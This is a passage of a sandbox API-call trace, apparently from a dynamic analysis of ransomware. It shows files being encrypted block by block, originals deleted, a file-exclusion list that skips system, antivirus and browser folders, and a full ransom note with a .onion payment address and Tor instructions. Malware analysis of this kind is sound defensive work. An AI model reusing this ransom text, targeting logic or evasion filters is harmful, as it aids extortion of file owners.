nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.199] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.199] GetLastError () returned 0x0 [0159.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.199] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.199] GetLastError () returned 0x0 [0159.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.199] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.199] GetLastError () returned 0x0 [0159.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.199] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.199] GetLastError () returned 0x0 [0159.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.200] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.200] GetLastError () returned 0x0 [0159.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.200] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.200] GetLastError () returned 0x0 [0159.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.200] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.200] GetLastError () returned 0x0 [0159.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.200] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.200] GetLastError () returned 0x0 [0159.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.200] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.200] GetLastError () returned 0x0 [0159.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.200] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.200] GetLastError () returned 0x0 [0159.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.201] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.201] GetLastError () returned 0x0 [0159.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.201] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.201] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.201] GetLastError () returned 0x0 [0159.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.201] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.201] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.201] GetLastError () returned 0x0 [0159.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.201] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.201] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui")) returned 0x20 [0159.201] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.201] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui") returned 1 [0159.202] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui")) returned 0 [0159.202] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" [0159.202] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT") returned 1 [0159.202] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\.xXE132.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\.xxe132.tmp")) returned 0xe132 [0159.203] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\.xXE132.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\.xxe132.tmp"), dwFlags=0x1) returned 0 [0159.203] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\.xXE132.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\.xxe132.tmp")) returned 1 [0159.203] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0159.203] wcslen (_String="OK") returned 0x2 [0159.203] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.203] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.203] CryptDestroyKey (hKey=0x9ad378) returned 1 [0159.203] CryptDestroyHash (hHash=0x9ad838) returned 1 [0159.203] CryptReleaseContext (hProv=0x8e3990, dwFlags=0x0) returned 1 [0159.203] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.203] GetLastError () returned 0x12 [0159.203] FindClose (in: hFindFile=0x9ad338 | out: hFindFile=0x9ad338) returned 1 [0159.203] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.204] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.204] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.205] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.205] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.205] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.205] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.205] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.205] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*.exe") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*.dll") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*.lnk") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*.bat") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*.ini") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*.msi") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*.scf") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*pagefile.sys*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*AppData*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*\\winrar\\*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*\\java\\*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*\\windows\\*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*\\ESET\\*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*\\AVG\\*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*Atheros*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*Realtek*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*bootmgr*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*boot*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*boot*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*IO.SYS*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*ntldr*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*chrome*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*opera*") returned 0 [0159.205] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", pszSpec="*firefox*") returned 0 [0159.205] wcslen (_String="\\\\?\\") returned 0x4 [0159.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad378 [0159.206] wcscmp (_String1=".", _String2=".") returned 0 [0159.206] FindNextFileW (in: hFindFile=0x9ad378, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.206] wcscmp (_String1="..", _String2=".") returned 1 [0159.206] wcscmp (_String1="..", _String2="..") returned 0 [0159.206] FindNextFileW (in: hFindFile=0x9ad378, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.206] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.206] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.206] strlen (_Str="NMoreira") returned 0x8 [0159.206] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.206] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.206] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.206] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 